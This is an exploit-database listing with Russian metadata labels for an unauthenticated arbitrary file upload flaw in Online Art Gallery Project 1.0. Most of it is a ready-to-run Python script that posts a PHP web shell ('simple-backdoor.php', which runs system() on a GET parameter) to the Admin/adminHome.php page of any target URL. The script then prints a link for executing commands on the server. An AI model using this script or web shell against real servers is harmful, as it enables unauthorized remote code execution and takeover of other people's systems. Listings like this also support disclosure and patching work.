Exploit Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)

[Exploiter]

EDB-ID

51524

Проверка EDB

1. Пройдено

Автор

RAMIL MUSTAFAYEV

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-N/A

Дата публикации

2023-06-15

Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)

# Exploit Title: Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)
# Google Dork: n/a
# Date: 14/06/2023
# Exploit Author: Ramil Mustafayev
# Vendor Homepage: https://github.com/projectworldsofficial
# Software Link: https://github.com/projectworlds32/Art-Gallary-php/archive/master.zip
# Version: 1.0
# Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28
# CVE : n/a

# Vulnerability Description:
#
# Online Art Gallery Project 1.0 allows unauthenticated users to perform arbitrary file uploads via the adminHome.php page. Due to the absence of an authentication mechanism and inadequate file validation, attackers can upload malicious files, potentially leading to remote code execution and unauthorized access to the server.
# Usage: python exploit.py http://example.com

import requests
import sys

def upload_file(url, filename, file_content):
    files = {
        'sliderpic': (filename, file_content, 'application/octet-stream')
    }

    data = {
        'img_id': '',
        'sliderPicSubmit': ''
    }
    url = url+"/Admin/adminHome.php"
    try:
        response = requests.post(url, files=files, data=data)
    except:
        print("[!] Exploit failed!")
    
if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python exploit.py <target_url>")
        sys.exit(1)

    target_url = sys.argv[1]
    file_name = "simple-backdoor.php"
    file_content = '<?php system($_GET["c"]);?>'

    upload_file(target_url, file_name, file_content)
    print("[+] The simple-backdoor has been uploaded.\n Check following URL: "+target_url+"/images/Slider"+file_name+"?c=whoami")